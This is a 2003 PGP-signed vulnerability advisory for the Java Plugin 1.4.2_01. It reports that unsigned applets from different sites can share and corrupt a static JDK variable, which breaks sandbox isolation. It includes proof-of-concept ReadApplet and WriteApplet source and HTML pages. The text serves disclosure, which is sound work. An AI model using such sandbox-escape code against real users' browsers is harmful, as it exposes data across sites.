-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Product  : Java Plugin
Version  : 1.4.2_01
OS       : Win32 (should apply for other OSs too)
URL      : http://java.sun.com
Found by : Marc Schoenefeld (marc@illegalaccess.org)
Date     : 10/21/03

PROBLEM DESCRIPTION :
Cross-Site Java
Unsigned applets coming from different sites may share data areas via
undocumented static variables of the jdk. While altering these variables
JDK internal states may become corrupt and functionality is no longer. This
especially concerns XML processing which depends on the
org.apache.xalan.processor.XSLProcessorVersion class.
This behavior violates the isolation restriction of the sandbox.

STEPS TO FOLLOW TO REPRODUCE THE PROBLEM :
Two applets,
 - one on siteA: www.siteA.org =3D> Read.html / ReadApplet.class
 - one on siteB: www.siteB.org =3D> Write.html / WriteApplet.class

Applet from siteB can share a variable also accessible (read and write)
which is used by siteA. So data protection is not guaranteed, an unsigned
applet may grab data stored in this variable by a signed applet
or interfere it's XML processing and therefore violates the isolation
restriction of the sandbox.


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DREADAPPLET=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld      */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

    public void paint(Graphics g)
    {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION=
);
    }

   static {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION=
);
   }
}
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DREADAPPLET=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DWRITEAPPLET=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
import java.awt.Graphics;


public class WriteApplet extends java.applet.Applet {
    public void paint(Graphics g)
    {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION +=3D "a";
    }


   static {
      org.apache.xalan.processor.XSLProcessorVersion.S_VERSION =3D "altered
from
SiteA";
  }
}
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DWRITEAPPLET=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D


=3D=3D=3D=3D=3D=3D=3D=3D=3DWrite.html=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<HTML>
<BODY BGCOLOR=3D#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=3D. code=3DWriteApplet.class width=3D100 height=3D100>
</applet>
</BODY>
</HTML>

=3D=3D=3D=3D=3D=3D=3D=3DRead.html=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<HTML>
<BODY BGCOLOR=3D#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=3D. code=3DReadApplet.class width=3D100 height=3D100>
</applet>
</BODY>
</HTML>


- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Sch=F6nefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE/lFKWqCaQvrKNUNQRAtSgAJ4k2hORvU0sxMYejBdc03dEFmUT8wCePPWy
+gwoqNdNGQ9VGJv3gnfxoVY=3D
=3DHPdA
-----END PGP SIGNATURE-----